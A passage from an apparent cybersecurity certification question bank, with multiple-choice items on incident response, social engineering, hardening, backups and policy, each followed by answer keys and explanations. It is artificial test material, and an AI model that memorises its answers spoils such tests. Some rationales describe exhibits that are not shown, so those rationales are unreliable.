Option B is correct because EDR isolation immediately blocks all network communication (including SMB) while preserving the endpoint's state for forensic analysis. This stops lateral movement and further encryption without losing volatile data like memory or running processes, which a shutdown would destroy.

Exam trap

The trap here is that candidates confuse 'stopping the activity' with 'shutting down,' not realizing that isolation halts network propagation without destroying the evidence needed for root-cause analysis.

How to eliminate wrong answers

Option A is wrong because shutting down the laptop destroys volatile evidence (e.g., memory-resident malware, encryption keys, active network connections) and may trigger anti-forensic routines. Option C is wrong because running a full antivirus scan while the system is still on the network allows the ransomware to continue encrypting files and spreading via SMB, and scans can be evaded by modern malware. Option D is wrong because reimaging wipes all evidence of the attack, including the ransomware binary, logs, and artifacts needed for incident response and attribution.

799
MCQmedium

A help desk agent receives a phone call from someone claiming to be a regional sales manager who says they are locked out before a customer demo. The caller knows a few employee names and asks the agent to reset the account and temporarily bypass MFA. What attack is most likely?

A.Spear phishing, because the caller used specific employee details to appear credible.
B.Vishing, because the attacker is using a voice call to pressure support staff into changing access.
C.Pretexting, because the attacker is creating a false identity and believable story.
D.Baiting, because the attacker offered a tempting opportunity tied to a customer demo.
AnswerB

Vishing is voice-based social engineering, and this scenario centers on a caller using urgency and credibility to trick the help desk into resetting access and weakening MFA controls.

Why this answer

Option B is correct because vishing (voice phishing) specifically involves using a phone call to socially engineer a target into performing an action, such as resetting credentials and bypassing MFA. The attacker pressures the help desk agent by creating urgency around a customer demo, which is a classic vishing tactic to bypass security controls.

Exam trap

The trap here is that candidates confuse pretexting (the false identity) with the delivery method (vishing), but the exam expects you to identify the specific attack vector—voice call—as the defining characteristic of vishing.

How to eliminate wrong answers

Option A is wrong because spear phishing is an email-based attack that uses personalized content to trick the recipient into clicking a link or opening an attachment, not a voice call. Option C is wrong because while pretexting involves creating a false identity and story, the specific attack vector here is a voice call, making vishing the more precise classification under social engineering. Option D is wrong because baiting involves offering something enticing (e.g., a free USB drive or download) to lure the victim, not using a fabricated story over the phone.

800
MCQmedium

After a phishing campaign, 18 employees entered credentials on a fake login page. Management wants a program that both reduces future click rates and provides measurable improvement over time. What should security implement?

A.A one-time company email reminding employees to be careful
B.Simulated phishing with targeted follow-up training and metrics
C.An updated password complexity rule for all users
D.A banner that all external email is untrusted
AnswerB

Simulated phishing lets the team measure behavior, reinforce learning, and track improvement over time.

Why this answer

Option B is correct because simulated phishing campaigns directly address the human factor by providing a controlled, repeatable test that measures click rates over time. When an employee falls for the simulation, targeted follow-up training (e.g., micro-learning modules) reinforces secure behavior, and the metrics (e.g., click-through rate, reporting rate) allow management to track improvement. This aligns with the security program management goal of continuous improvement through measurable security awareness.

Exam trap

The trap here is that candidates often choose a technical control (like password complexity or email banners) thinking it addresses phishing, but the question specifically asks for a program that reduces click rates and provides measurable improvement—which requires a behavioral, training-based approach with metrics, not a static technical fix.

How to eliminate wrong answers

Option A is wrong because a one-time email reminder provides no mechanism to measure improvement over time and does not actively test or reinforce behavior; it is a static, non-iterative control. Option C is wrong because password complexity rules do not address phishing click rates—they mitigate credential strength but do not prevent users from entering credentials on a fake page. Option D is wrong because an external email banner is a passive indicator that relies on user attention and does not provide training or metrics to reduce click rates or measure improvement.

801
Multi-Selecthard

A developer installed an unknown root CA on a laptop. The browser now accepts a proxy certificate for intranet.apps.example without warnings. Which two controls most directly reduce the chance that this endpoint trusts a malicious interception certificate? Select two.

Select 2 answers
A.Enforce certificate pinning in the application for the expected server certificate.
B.Allow employees to add any root CA as long as the certificate is password-protected.
C.Prevent local administrators from modifying the trusted root store through endpoint policy.
D.Rely on HTTPS alone because any certificate over TLS is safe.
E.Disable DNS because certificate trust does not depend on hostnames.
AnswersA, C

Certificate pinning reduces the chance that a malicious trusted root on the endpoint can impersonate the server. The app checks for a known certificate or public key, not just any certificate signed by a trusted CA.

Why this answer

Option A is correct because certificate pinning hard-codes the expected server certificate or public key into the application, so even if a malicious root CA is trusted by the OS, the application will reject any proxy certificate that does not match the pinned certificate. This directly prevents the browser from accepting the proxy certificate without warnings, as the pinning check occurs at the application layer before the TLS handshake completes.

Exam trap

The trap here is that candidates may think password protection on a certificate adds security against interception, but it only protects the private key file, not the trust decision, and the real risk is the unauthorized addition of a root CA to the trusted store.

802
MCQmedium

Based on the exhibit, what is the most likely issue with the software component being built?

A.Supply-chain compromise, because the dependency may have been altered before it reached the build pipeline.
B.Cross-site scripting, because the package name suggests the application handles web content.
C.Credential stuffing, because automated systems frequently reuse credentials during updates.
D.Replay attack, because the nightly pipeline used an old copy of the package request.
AnswerA

A checksum or integrity mismatch during an automated dependency pull is a strong sign that the package may have been tampered with in transit or replaced in the software supply chain. Because the build pipeline trusted the registry source automatically, the control failure is around dependency integrity and third-party trust.

Why this answer

The exhibit shows a build pipeline that fetches a dependency from a public repository. If the dependency has been tampered with before it reaches the pipeline, this is a classic supply-chain compromise. Attackers often inject malicious code into popular open-source packages, which then gets incorporated into the build, compromising the final software component.

Exam trap

The trap here is that candidates may confuse a supply-chain compromise with a web-specific attack like XSS, but the question's context of a build pipeline and dependency fetching points directly to the integrity of the software supply chain.

How to eliminate wrong answers

Option B is wrong because cross-site scripting (XSS) is a web application vulnerability that allows injection of malicious scripts into web pages, not an issue with a build pipeline or dependency integrity. Option C is wrong because credential stuffing involves using stolen credentials to gain unauthorized access to accounts, not a problem with automated build systems reusing credentials during updates. Option D is wrong because a replay attack involves intercepting and retransmitting a valid data transmission, not using an old copy of a package request in a nightly pipeline.

803
MCQmedium

Based on the exhibit, what is the best risk treatment recommendation for the security manager?

A.Accept the risk because backups are already enabled.
B.Mitigate the risk with compensating controls until the migration is complete.
C.Avoid the risk by immediately retiring the portal.
D.Transfer the risk by purchasing cyber insurance only.
AnswerB

This is the best fit because the business must keep the service running, and approved budget exists for additional controls. Compensating controls can reduce exposure without shutting the portal down.

Why this answer

Mitigation is the strongest recommendation here because the portal must stay available for 90 more days, yet the risk score is high and existing controls are limited. Since the organization has budget for compensating controls, the manager should reduce likelihood and impact through measures such as tighter access restrictions, additional monitoring, or isolation. That preserves the business function while lowering exposure until migration is complete.

Why others are wrong: Accepting the risk leaves a high-likelihood, high-impact exposure in place without additional protection. Avoiding the risk would effectively shut down a required business service before the replacement is ready. Transferring the risk through insurance may help with financial loss, but it does not actually reduce the portal’s attack surface or the chance of disruption.

804
MCQmedium

Following a ransomware incident, management wants to verify that backups are usable and that a restored file server will meet recovery expectations before declaring the system trusted again. Which action is best?

A.Review the backup job logs and mark the backups as valid.
B.Perform a documented restore test in an isolated environment and validate the recovered data.
C.Increase the retention period so more restore points are available later.
D.Create a new full backup immediately after the incident and trust that one instead.
AnswerB

A restore test proves the backup can be recovered and helps confirm the data and services meet continuity requirements.

Why this answer

Option B is correct because performing a documented restore test in an isolated environment is the only action that directly validates the integrity and usability of backups, ensuring the restored file server meets recovery point objective (RPO) and recovery time objective (RTO) expectations. This process verifies that the backup data is not corrupted, encrypted, or incomplete, which is critical after a ransomware incident where backups may have been targeted. Without such a test, management cannot confidently declare the system trusted, as logs or retention changes do not prove data recoverability.

Exam trap

The trap here is that candidates assume backup logs or increased retention are sufficient to prove recoverability, but CompTIA emphasizes that only a documented restore test in an isolated environment provides the empirical evidence needed to declare a system trusted after a security incident.

How to eliminate wrong answers

Option A is wrong because reviewing backup job logs only confirms that the backup process completed without errors, but it does not verify that the actual data is usable, free from ransomware encryption, or restorable to a functional state. Option C is wrong because increasing the retention period merely preserves more restore points for future use, but it does not validate the current backups' integrity or usability, and it may retain compromised backups. Option D is wrong because creating a new full backup immediately after the incident does not guarantee that the backup is free from malware or that the restored system will meet recovery expectations; it only provides a fresh copy without validation.

805
MCQmedium

A Linux server is being prepared for production as a database host. The build team notices that a graphical desktop environment, an unused FTP service, and an open mail submission port are present on the image, even though none of them are required. The organization wants future builds to be consistent and easy to verify. What is the best approach?

A.Leave the image unchanged so troubleshooting remains easier for administrators.
B.Use the image only for development and skip security review for production.
C.Create and enforce a hardened build standard that removes unnecessary services and ports, then validate future servers against it.
D.Add another firewall rule set and keep every installed service in place.
AnswerC

A hardened build standard defines exactly which services, packages, and ports are allowed on the server. Removing the graphical environment, FTP service, and unnecessary mail port reduces the attack surface. Validating future systems against the standard also makes the build repeatable and helps identify drift quickly.

Why this answer

Option C is correct because it establishes a hardened baseline configuration that removes unnecessary services (e.g., FTP on port 21) and closes unused ports (e.g., mail submission port 587), ensuring consistency and simplifying verification. This aligns with the principle of minimizing attack surface by disabling all non-essential components before production deployment. A hardened build standard also enables automated compliance checks (e.g., using CIS benchmarks or OpenSCAP) to validate future servers against the defined secure state.

Exam trap

The trap here is that candidates may think leaving the image unchanged aids troubleshooting (Option A), but in security architecture, consistency and minimal attack surface always take precedence over convenience, and a hardened standard is the only way to ensure repeatable, verifiable builds.

How to eliminate wrong answers

Option A is wrong because leaving the image unchanged with a graphical desktop, unused FTP service, and open mail submission port increases the attack surface and violates the principle of least functionality, making security audits more difficult rather than easier. Option B is wrong because using the image only for development and skipping security review for production introduces unnecessary risk; production systems must undergo security review regardless of their origin, and development images often contain insecure defaults that should not be promoted without hardening.

806
MCQeasy

A company moves a Linux server to infrastructure as a service (IaaS). Which task remains the customer's responsibility?

A.Patching the guest operating system and installed applications.
B.Replacing failed power supplies in the data center.
C.Maintaining the hypervisor on the host system.
D.Building and securing the provider's network backbone.
AnswerA

This is the best answer because in IaaS the customer still manages the guest operating system and the software running on it. The cloud provider handles the underlying physical infrastructure, but the customer is responsible for keeping the VM patched and hardened. That distinction is a key part of the shared responsibility model.

Why this answer

In an IaaS model, the cloud provider manages the physical infrastructure, hypervisor, and network backbone, while the customer retains responsibility for securing and maintaining the guest operating system and any installed applications. This includes applying security patches, updating software, and configuring the OS-level firewall. For a Linux server, the customer must run commands like `apt update && apt upgrade` or `yum update` to patch the OS and manage application dependencies.

Exam trap

The trap here is that candidates often confuse IaaS with PaaS or SaaS, assuming the provider patches the OS, but in IaaS the customer retains full control and responsibility for the guest operating system and applications.

How to eliminate wrong answers

Option B is wrong because replacing failed power supplies in the data center is the responsibility of the IaaS provider, who manages the physical hardware and facility infrastructure. Option C is wrong because maintaining the hypervisor on the host system is the provider's duty under IaaS, as the hypervisor is part of the virtualization layer that the customer does not control. Option D is wrong because building and securing the provider's network backbone is entirely the provider's responsibility; the customer only manages virtual networks and security groups within their tenant.

807
MCQmedium

A SOC analyst detects that a user's workstation is sending large volumes of data to an unusual external IP address during non-business hours. The analyst has already isolated the workstation by disconnecting it from the network. What is the NEXT step in the incident response process?

A.Reimage the workstation to remove any malware
B.Perform a forensic analysis of the workstation to collect evidence
C.Reset the user's password to prevent further unauthorized access
D.Notify law enforcement immediately
AnswerB

After containment, forensic analysis is necessary to determine the cause and scope of the incident, preserve evidence, and inform further actions. This aligns with industry-standard incident response frameworks.

Why this answer

After isolating the workstation, the next step in the incident response process is to perform forensic analysis to collect evidence. This aligns with the NIST SP 800-61 framework, where containment (isolation) is followed by eradication and recovery, but evidence collection must occur before any destructive actions like reimaging. The forensic analysis preserves volatile data (e.g., memory, network connections) and non-volatile data (e.g., disk artifacts) to determine the scope and cause of the data exfiltration.

Exam trap

The trap here is that candidates often confuse containment with eradication, selecting reimaging (Option A) prematurely without recognizing that evidence preservation is a mandatory step before any destructive remediation in the incident response process.

How to eliminate wrong answers

Option A is wrong because reimaging the workstation destroys potential evidence (e.g., malware binaries, registry keys, log files) before forensic analysis can be performed, violating the order of the incident response process. Option C is wrong because resetting the user's password addresses authentication but does not remediate the underlying compromise (e.g., a backdoor or data exfiltration tool) and is not the immediate next step after isolation. Option D is wrong because notifying law enforcement is a strategic decision that typically occurs after evidence is collected and the incident is fully characterized, not as the immediate next step after isolation.

808
MCQmedium

A records manager finds a folder of payroll reports on a shared drive. The business says the reports are no longer active, but legal retention rules require keeping them for another two years. What is the best action?

A.Delete the reports immediately because the business no longer uses them
B.Move the reports to an approved archive and retain them for the required period
C.Email the reports to each manager so they can keep their own copy
D.Rename the folder so users do not notice it on the shared drive
AnswerB

An approved archive preserves the records for the retention period while keeping them controlled and available for audit or legal needs.

Why this answer

Option B is correct because the reports are subject to a legal retention policy requiring two more years of storage. Moving them to an approved archive ensures they remain accessible for compliance purposes while removing them from the active shared drive, which reduces the risk of accidental modification or deletion. This aligns with data lifecycle management and legal hold procedures.

Exam trap

The trap here is that candidates may assume 'no longer active' means the data can be deleted, ignoring the overriding legal retention requirement, or they may think renaming or distributing files is a valid workaround instead of using a proper archive solution.

How to eliminate wrong answers

Option A is wrong because deleting the reports immediately violates the legal retention requirement, exposing the organization to non-compliance penalties. Option C is wrong because emailing reports to managers creates uncontrolled copies, increases the risk of data leakage, and does not ensure centralized retention or auditability. Option D is wrong because renaming the folder does not address the retention requirement and may lead to data loss or unauthorized access if the folder is still on the shared drive.

809
MCQmedium

Based on the exhibit, what type of malware is the most likely issue on the workstation?

A.Spyware, because the system appears to be collecting user data silently.
B.Ransomware, because the browser settings changed after installation.
C.Rootkit, because the endpoint security console detected an unknown process.
D.Worm, because the software was installed from an unofficial website.
AnswerA

Spyware is the best fit because the symptoms show covert data collection and tracking behavior. The unwanted browser extension, the repeated outbound traffic to a tracking domain, and the access to saved cookies all point to surveillance and data theft rather than encryption or destructive behavior.

Why this answer

The exhibit shows a browser extension installed from an unofficial website that is silently collecting browsing data, including keystrokes and visited URLs, which is characteristic of spyware. Spyware operates by gathering user information without consent, often through seemingly legitimate software, and the absence of encryption or user notification confirms this classification.

Exam trap

The trap here is that candidates confuse the symptom of changed browser settings with ransomware, but ransomware's primary action is file encryption or system lockout, not silent data collection, and the unofficial website installation is a red herring for worm propagation.

How to eliminate wrong answers

Option B is wrong because ransomware typically encrypts files or locks the system and demands payment, not merely changes browser settings after installation. Option C is wrong because a rootkit is designed to hide its presence and evade detection by security software, so an endpoint security console detecting an unknown process would indicate a different threat, not a rootkit. Option D is wrong because a worm self-replicates and spreads across networks without user interaction, whereas the issue here involves installation from an unofficial website, which is a common vector for spyware, not a worm.

810
MCQmedium

A vulnerability scan of a branch-office print server finds that its administrative web console is reachable from the internet. The appliance is still using the vendor's default password, and no access control list limits management access to the office subnet or VPN. Which remediation would reduce risk the most with the least disruption?

A.Increase the password length policy and leave the console publicly reachable.
B.Disable the management interface entirely and replace the device immediately.
C.Restrict management access to the office network or VPN and change the default credentials.
D.Apply a patch after the next quarterly maintenance window and keep the current exposure unchanged.
AnswerC

This is the best balance of security and operational impact. Publicly exposed administration interfaces are high-risk, especially when default credentials are still enabled. Limiting access to a trusted management network or VPN immediately reduces attack surface, while changing the vendor defaults removes a common compromise path. Together, these steps address the exposure without requiring a full replacement or major service outage.

Why this answer

Option C reduces risk the most with the least disruption by immediately addressing the two primary vulnerabilities: the default password and unrestricted internet exposure. Changing the default credentials prevents trivial authentication bypass, while restricting management access to the office subnet or VPN eliminates the attack surface from the public internet. This approach requires no hardware replacement or downtime, and it directly mitigates the highest-severity issues identified in the scan.

Exam trap

The trap here is that candidates may choose Option B (disable and replace) because it seems most secure, but they overlook that configuration changes (ACL and password reset) achieve the same security goal with far less disruption and cost.

How to eliminate wrong answers

Option A is wrong because increasing the password length policy does not address the fact that the default password is still in use; an attacker can still authenticate with the known default credential, rendering the policy change irrelevant. Option B is wrong because disabling the management interface entirely and replacing the device immediately is unnecessarily disruptive and costly; the device can be secured with configuration changes without replacement, and disabling the interface may prevent necessary administrative tasks. Option D is wrong because applying a patch after the next quarterly maintenance window leaves the console publicly reachable with default credentials for an extended period, which is a critical risk that should be remediated immediately, not deferred.

811
MCQmedium

Several Windows servers were built from the same image, and all of them use the same local Administrator password. What is the best operational hardening change?

A.Keep the shared password but store it in a spreadsheet with restricted access.
B.Implement a tool that automatically sets unique local admin passwords on each server.
C.Remove all administrator accounts from the servers.
D.Change the password manually once a year on one server only.
AnswerB

This is the best hardening change because shared local administrator passwords create an easy lateral-movement path if one server or credential is exposed. A password management solution that generates unique local admin passwords reduces blast radius while preserving administrative access. It also supports safer operational management because the passwords can still be retrieved or rotated through controlled processes instead of being duplicated across systems.

Why this answer

Option B is correct because using a tool like Local Administrator Password Solution (LAPS) automates the rotation of unique, complex passwords for each server's local administrator account. This eliminates the risk of lateral movement if one server's credentials are compromised, as each machine has a distinct password stored securely in Active Directory.

Exam trap

The trap here is that candidates may think storing the password securely (Option A) is sufficient, but the core issue is the shared password itself, not just its storage; the exam emphasizes eliminating shared credentials across systems to prevent lateral movement.

How to eliminate wrong answers

Option A is wrong because storing the shared password in a spreadsheet, even with restricted access, still leaves a single point of failure; if the spreadsheet is breached, all servers are compromised. Option C is wrong because removing all administrator accounts would break essential administrative functions and is not a recommended hardening practice; instead, you should rename or disable the built-in Administrator account. Option D is wrong because manually changing the password once a year on only one server does not address the shared password issue across all servers and leaves the others vulnerable indefinitely.

812
MCQmedium

A branch office stores nightly backups on a NAS that is joined to the same Active Directory domain as the production servers. After a ransomware incident, management wants a backup design that is much harder for attackers to encrypt or delete. Which approach is the best improvement?

A.Increase the backup frequency to every hour while keeping the same NAS design.
B.Store all backups on the same network segment for faster restore access.
C.Maintain an offline or immutable backup copy in a separate administrative boundary.
D.Use only snapshots on the production storage array because they are instant to restore.
AnswerC

Offline or immutable backups resist tampering and remain available even if the production domain is compromised.

Why this answer

Option C is correct because maintaining an offline or immutable backup copy in a separate administrative boundary ensures that attackers cannot encrypt or delete the backups, even if they compromise the Active Directory domain. An offline backup (e.g., tape or disconnected disk) is physically isolated, while immutable backups (e.g., using S3 Object Lock or a NAS with WORM capabilities) prevent modification or deletion for a defined retention period. This design breaks the attacker's ability to propagate ransomware to the backup repository, addressing the core requirement of making backups much harder to encrypt or delete.

Exam trap

The trap here is that candidates often assume increasing backup frequency or keeping backups on the same network segment improves recovery speed, but they overlook the fundamental need for isolation and immutability to protect against ransomware encryption and deletion.

How to eliminate wrong answers

Option A is wrong because increasing backup frequency to every hour on the same NAS joined to Active Directory does not prevent attackers from encrypting or deleting the backups; if the NAS is compromised via the domain, all copies remain vulnerable. Option B is wrong because storing all backups on the same network segment as production servers increases the attack surface and allows ransomware to spread laterally to the backup storage, defeating the goal of isolation.

813
MCQeasy

A company wants every corporate laptop to use the same required screen-lock timeout, disk encryption setting, and local administrator restriction. Which document should define these mandatory settings?

A.A guideline, because it offers flexible suggestions for users
B.A standard, because it specifies required configuration values
C.A procedure, because it explains the business reason for security rules
D.A memo, because it is the fastest way to communicate changes
AnswerB

A standard sets the exact mandatory baseline that all devices must follow consistently.

Why this answer

A standard is the correct document type because it mandates specific, measurable configuration values (e.g., screen-lock timeout of 300 seconds, AES-256 disk encryption, removal of local admin rights) that all corporate laptops must enforce. Standards are binding and establish a baseline for security compliance, unlike guidelines which are advisory. This aligns with the company's requirement for mandatory, uniform settings across all devices.

Exam trap

The trap here is confusing a 'standard' (which sets mandatory, measurable requirements) with a 'guideline' (which is optional and advisory), leading candidates to pick A because they think 'required' implies flexibility, when in fact standards are the only document type that enforces specific configuration values.

How to eliminate wrong answers

Option A is wrong because a guideline offers flexible suggestions or recommendations, not mandatory requirements, so it cannot enforce the required screen-lock timeout, disk encryption, or local administrator restriction. Option C is wrong because a procedure describes step-by-step instructions for performing a task (e.g., how to configure the screen-lock timeout), not the mandatory configuration values themselves; it explains the 'how,' not the 'what must be set.'

814
Multi-Selectmedium

Employees use a browser SaaS portal, a native mobile app, and an internal API. The company wants one corporate identity, reduced password reuse, and automated removal of access when HR terminates users. Which two solutions best meet the requirement? Select two.

Select 2 answers
A.Create separate local usernames and passwords in each application for every employee.
B.Use federation so the SaaS apps trust the company's identity provider.
C.Store passwords in a shared vault and let users retrieve them when needed.
D.Automate account provisioning and deprovisioning from HR changes with SCIM or an equivalent feed.
E.Allow the mobile app to authenticate only from remembered devices, without central identity controls.
AnswersB, D

Federation centralizes authentication at the corporate identity provider and reduces separate credential stores.

Why this answer

Federation (B) allows the SaaS portal, mobile app, and internal API to trust a single corporate identity provider (IdP) using standards like SAML 2.0 or OIDC. This gives employees one set of credentials, reduces password reuse, and enables centralized control. When HR terminates a user, the IdP can revoke access instantly, affecting all federated applications.

Exam trap

The trap here is that candidates often think federation alone solves all identity lifecycle problems, but the question explicitly requires automated removal of access, which demands a provisioning protocol like SCIM in addition to federation.

815
MCQeasy

A company wants to state that customer data must not be emailed externally unless a manager approves the exception. Which document type should contain this rule?

A.Policy, because it establishes mandatory organizational rules
B.Guideline, because it gives staff flexible suggestions about email use
C.Procedure, because it lists the exact button clicks for sending email
D.Standard, because it provides a general recommendation for communication
AnswerA

A policy is the correct choice when the company wants to set a mandatory rule that applies organization-wide and governs behavior.

Why this answer

A policy is the correct document type because it establishes mandatory organizational rules that must be followed. The requirement that customer data must not be emailed externally without manager approval is a binding directive, not a suggestion or a step-by-step guide. Policies define high-level security requirements that all employees must comply with, making them the appropriate vehicle for this rule.

Exam trap

The trap here is that candidates often confuse 'policy' with 'standard' or 'guideline', mistakenly thinking a rule about data transmission is a technical standard or a flexible suggestion, when in fact it is a mandatory organizational directive that must be enforced.

How to eliminate wrong answers

Option B is wrong because a guideline provides flexible suggestions or best practices, not mandatory rules; this requirement is a strict prohibition, not a recommendation. Option C is wrong because a procedure lists detailed step-by-step instructions (e.g., exact button clicks in an email client), not a high-level rule about data handling. Option D is wrong because a standard specifies technical specifications or configurations (e.g., encryption protocols like TLS 1.2), not a general rule about data transmission approval.

816
MCQeasy

A scan finds two issues: a critical vulnerability on an internet-facing VPN appliance with public exploit code, and a medium-severity issue on an internal test server. Which should be fixed first?

A.The internal test server issue, because test systems are always higher risk.
B.The VPN appliance issue, because it is critical and publicly exploitable.
C.Both issues at the same time without assigning a priority.
D.Neither issue, because scanners can produce false positives.
AnswerB

An internet-facing critical vulnerability with available exploit code presents a much higher likelihood of real-world compromise and should be prioritized first.

Why this answer

The VPN appliance issue should be fixed first because it is a critical vulnerability on an internet-facing system with publicly available exploit code. This combination means an attacker can directly compromise the appliance from the internet with minimal effort, leading to potential network breach and lateral movement. In contrast, the internal test server is less accessible and poses a lower immediate risk, even though it should still be addressed in due course.

Exam trap

The trap here is that candidates assume all vulnerabilities must be fixed in order of severity alone, ignoring the critical factor of asset exposure and exploitability, which CompTIA emphasizes in risk-based prioritization.

How to eliminate wrong answers

Option A is wrong because test systems are not inherently higher risk than internet-facing production systems; the risk is determined by exposure, exploitability, and impact, not by system role alone. Option C is wrong because security resources are finite and prioritization is essential; treating all issues equally ignores the urgency of a critical, publicly exploitable vulnerability on an internet-facing asset.

817
Multi-Selecteasy

A small business web server still allows remote administration from the internet on port 3389, and the administrator password has never been changed from the vendor default. Which two issues should the security team prioritize first? Select two.

Select 2 answers
A.An exposed remote administration service
B.Default credentials still being in use
C.A missing screen-lock timeout on nearby laptops
D.A lack of encrypted email attachments
E.An outdated printer driver on the finance network
AnswersA, B

An internet-exposed management service is risky because it gives attackers a direct path to the system from outside the network.

Why this answer

Port 3389 is used by Remote Desktop Protocol (RDP), which is a remote administration service. Exposing RDP directly to the internet is a critical vulnerability because it allows attackers to perform brute-force or credential-stuffing attacks against the service. This is a high-priority issue because it provides an attack vector that can lead to full system compromise.

Exam trap

The trap here is that candidates may overlook the combination of exposed RDP and default credentials as the most urgent issues, instead focusing on a less critical physical security control like screen-lock timeout, which is not directly related to the internet-facing vulnerability.

818
MCQeasy

A critical patch must be applied to a retail point-of-sale server. What is the best way to reduce business disruption?

A.Apply the patch during the busiest business hours to make the change sooner.
B.Schedule the patch during an approved maintenance window.
C.Skip the patch and rely on hope that the issue will not be exploited.
D.Turn off all backups so the patch process runs faster.
AnswerB

A maintenance window is the best choice because it lets the organization perform the update when user impact is expected to be lowest. This is a core change-control practice for systems that support business operations. It gives the team time to test, monitor, and recover if something goes wrong without affecting customers during peak use.

Why this answer

Scheduling the patch during an approved maintenance window is the best practice to minimize business disruption because it allows the organization to plan for downtime during low-activity periods, coordinate with stakeholders, and ensure rollback procedures are in place. For a retail point-of-sale (POS) server, applying a critical patch outside of business hours prevents transaction interruptions and potential revenue loss, aligning with change management policies that prioritize availability and security.

Exam trap

The trap here is that candidates may choose Option A, thinking that applying a patch sooner reduces risk, but they overlook the immediate business disruption and the importance of change management processes that prioritize availability over speed.

How to eliminate wrong answers

Option A is wrong because applying a patch during busiest business hours would directly disrupt customer transactions, causing immediate revenue loss and potential data integrity issues, which contradicts the goal of reducing business disruption. Option C is wrong because skipping a critical patch leaves the POS server vulnerable to known exploits, such as remote code execution or data breaches, which can lead to greater long-term disruption and regulatory non-compliance. Option D is wrong because turning off backups eliminates the ability to restore the system to a known good state if the patch causes a failure, increasing the risk of extended downtime and data loss.

819
MCQmedium

A security analyst detects a high volume of failed authentication attempts from IP address 203.0.113.1 against a web application. The attempts use different usernames, such as 'admin', 'root', 'test', and several common names. Account lockout policies are configured to lock an account after five failed attempts. Despite this, the analyst sees the attempts continuing over several hours. Which of the following security controls is most likely missing or improperly configured?

A.Increase the account lockout threshold to a lower number
B.Implement geofencing to block traffic from the attacker's region
C.Configure rate limiting per source IP address
D.Enable detailed failed login attempt logging
AnswerC

Rate limiting on the application or firewall level restricts the number of authentication attempts from a single IP address over a given time period, regardless of the username being tried. This directly counters the attacker's strategy of rotating usernames to bypass account lockout.

Why this answer

Rate limiting per source IP address is the correct control because it restricts the number of authentication requests from a single IP (203.0.113.1) within a given time window, regardless of the usernames used. Account lockout policies are ineffective here because the attacker is rotating through different usernames (e.g., 'admin', 'root', 'test'), so no single account reaches the five-failed-attempt threshold. By limiting the request rate from the source IP, the analyst can throttle the attacker's brute-force attempts without affecting legitimate users.

Exam trap

The trap here is that candidates assume account lockout policies are sufficient for all brute-force attacks, but they fail to recognize that rotating usernames (a 'password spraying' attack) bypasses per-account lockout, making per-source-IP rate limiting the correct mitigation.

How to eliminate wrong answers

Option A is wrong because decreasing the lockout threshold (e.g., to 3 attempts) would not stop the attack—the attacker is using different usernames, so no single account ever hits even a lower threshold. Option B is wrong because geofencing blocks traffic based on geographic location, but the attacker could be using a VPN or proxy to appear from a different region, and the question does not indicate the IP is from a specific region that should be blocked. Option D is wrong because enabling detailed failed login attempt logging would only improve visibility into the attack, not prevent or mitigate it; logging is a detective control, not a preventive or throttling control.

820
MCQeasy

A company is placing its public web server so internet users can reach it, but the database server must stay hidden from the internet and be reachable only by the web server. Which design best supports this goal?

A.Put both servers on the same flat internal network
B.Place the web server in a DMZ and keep the database server on the internal network
C.Put the database server in the DMZ and the web server on the internal network
D.Disable the firewall so the web server can communicate freely with all hosts
AnswerB

A DMZ is designed for internet-facing systems, while the database remains on a more trusted internal segment.

Why this answer

Option B is correct because it uses a DMZ (demilitarized zone) to isolate the public-facing web server from the internal network. The web server in the DMZ is accessible from the internet, while the database server remains on the internal network, reachable only by the web server through a firewall rule that permits traffic on the specific database port (e.g., TCP 3306 for MySQL). This layered security design prevents direct internet access to sensitive data.

Exam trap

The trap here is that candidates may think placing the database server in the DMZ is acceptable because it is 'protected' by a firewall, but they overlook that the DMZ is still accessible from the internet, making the database directly reachable and violating the requirement to keep it hidden.

How to eliminate wrong answers

Option A is wrong because placing both servers on the same flat internal network exposes the database server to the internet if the web server is compromised, as there is no network segmentation to restrict lateral movement. Option C is wrong because putting the database server in the DMZ and the web server on the internal network would expose the database directly to the internet, defeating the goal of hiding it, and would require the web server to initiate outbound connections to the DMZ, which is less secure and more complex to manage.

821
MCQmedium

An IDS generates an alert for possible SQL injection against an internal reporting portal at 02:00. The web logs show the source IP belongs to the company's approved vulnerability scanner, the request path matches the scheduled test window, and the WAF blocked the request. What is the most appropriate analyst conclusion?

A.Treat it as a confirmed intrusion and immediately take the portal offline.
B.Close it as expected activity after validating the scanner schedule and source IP.
C.Classify it as malware because the blocked payload proves the scanner is infected.
D.Disable the WAF rule so the scanner can complete without generating more alerts.
AnswerB

The logs align with an authorized scanner operating during a planned maintenance window, and the WAF successfully blocked the payload. After confirming the scan authorization, the alert can be documented and closed as expected activity rather than escalated as a live attack.

Why this answer

Option B is correct because the alert matches expected, authorized activity: the source IP belongs to the approved vulnerability scanner, the request occurred during the scheduled test window, and the WAF blocked the malicious payload. This is a classic false positive triggered by legitimate security testing, not an actual intrusion. The analyst should validate the scanner schedule and source IP, then close the alert as expected activity.

Exam trap

The trap here is that candidates see a blocked SQL injection payload and assume it is a real attack, forgetting to verify whether the source is an authorized vulnerability scanner operating during a scheduled test window.

How to eliminate wrong answers

Option A is wrong because taking the portal offline is an overreaction to a false positive; the request was from an authorized scanner and blocked by the WAF, so there is no confirmed intrusion. Option C is wrong because classifying the scanner as infected based solely on a blocked SQL injection payload is a logical leap; scanners intentionally send malicious payloads to test defenses, and the WAF block proves the control worked, not that the scanner is compromised. Option D is wrong because disabling the WAF rule would remove protection against real attacks, and the scanner can still complete its tests with the WAF blocking its payloads—the alerts can be tuned or suppressed instead.

822
MCQeasy

A finance application records each approval with the manager's unique user ID and a digital signature. Auditors want proof that the manager cannot later deny approving the transaction. Which security objective is most directly being addressed?

A.Availability
B.Nonrepudiation
C.Confidentiality
D.Accountability
AnswerB

Nonrepudiation provides strong proof of who performed an action, making later denial difficult or impossible.

Why this answer

Nonrepudiation ensures that a party cannot deny having performed a specific action. By recording the manager's unique user ID and a digital signature, the system provides cryptographic proof that the manager approved the transaction, making it impossible for them to later deny it. This directly addresses the audit requirement for undeniable evidence of approval.

Exam trap

CompTIA often tests the distinction between accountability (logging who did what) and nonrepudiation (cryptographic proof that prevents denial), so candidates may pick 'Accountability' because they see user IDs and logs, missing that the digital signature is the key element for nonrepudiation.

How to eliminate wrong answers

